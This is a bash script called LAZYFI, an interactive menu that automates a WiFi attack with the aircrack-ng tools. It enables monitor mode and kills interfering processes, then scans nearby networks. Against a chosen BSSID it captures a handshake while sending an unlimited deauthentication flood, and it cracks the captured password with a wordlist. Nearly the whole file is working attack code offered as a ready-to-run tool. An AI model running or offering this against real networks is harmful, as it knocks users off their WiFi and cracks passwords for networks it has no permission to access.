#!/bin/bash
clear
printf '\033]2;LAZYFI\a'
echo -e '\e[36mWelcome To Lazyfi\e[0m'
sleep 2
clear
echo -e '\e[31mPress Any Key To Proceed!\e[0m'
read -n 1
clear
echo -e "\e[36mStarting wlan0"
airmon-ng start wlan0
sleep 1
clear
echo -e '\e[36mChecking Interface...'
sleep 1
airmon-ng > temp.txt
echo -e 'Done!'
sleep 1
clear
int=$(egrep -row 'wlan0mon|mon0' temp.txt)
sleep 1
clear
echo -e 'Your Interface is '$int
sleep 1
clear
rm temp.txt
echo -e 'Killing unnecessary process...'
airmon-ng check kill
sleep 1
clear
echo -e '\e[31mCheck the other Terminal for a list of available wifi...'&& gnome-terminal -- bash -c " airodump-ng $int; read"
sleep 2
echo -e 'Please make a copy of Bssid and Channel Then Press Enter To Proceed.....\e[0m'
read
clear 
option=0
while true; do
echo -e '\e[92m##           ###     ########  ##    ##  ########  ####'
echo -e '##          ## ##         ##    ##  ##   ##         ##'
echo -e '##         ##   ##       ##      ####    ##         ##'
echo -e '##        ##     ##     ##        ##     ######     ##'
echo -e '##        #########    ##         ##     ##         ##'
echo -e '##        ##     ##   ##          ##     ##         ##'
echo -e '########  ##     ##  ########     ##     ##        ####'
echo -e ':::::::::::::::::::::::::::::::::::::::::::::::::::::::'
echo -e '|                                                     |'
echo -e '|            Choose an option to continue             |'
echo -e '|                                                     |'
echo -e '|    [1] start monitor mode & send deauth signal      |'
echo -e '|                                                     |'
echo -e '|    [2] crack password                               |'
echo -e '|                                                     |'
echo -e '|    [3] clean capture files                          |'
echo -e '|                                                     |'
echo -e '|    [4] Exit                                         |'
echo -e '|                                                     |'
echo -e ':::::::::::::::::::::::::::::::::::::::::::::::::::::::'
echo -n 'Lazy--> '
	read option
	case $option in
	
	1)
	echo -n 'Please Specify Bssid: '
	read id
	echo -n 'Please Specify Channel: '
        read chnl
	echo -n 'Please Specify capture file name: '
        read file
	echo -e "Starting Monito mode..."
	sleep 1
	echo -e "Sending Deauth Signal..."
	gnome-terminal -- airodump-ng --bssid $id --channel $chnl --write $file $int && gnome-terminal -- bash -c "sleep 2 ; aireplay-ng --deauth 0 -a $id $int; read"
	clear
	;;
	2)
	echo -e "Let's Crack The Password!"
	sleep 1
	echo -n "Give me a Wordlist: "
	read wrd
	sleep 1
	echo -e "Getting The capture file..."
	sleep 1
	cap=*.cap
	sleep 1
	echo -e "Starting Now..."
	sleep 1
	gnome-terminal -- bash -c "aircrack-ng -w $wrd $cap ; read"
	;;
	3)
	clear
	echo -e "Cleaning Files..."
	rm *.cap
	rm *.csv
	rm *.netxml
	sleep 2
	echo -e "Done!"
	sleep 2
	clear
	;;
	4)
	clear
	break
	;;
	*)
	clear
	echo -e "Wrong Key!"
	sleep 1
	echo -e "Try Again!"
	sleep 1
	clear
	;;
	esac
done
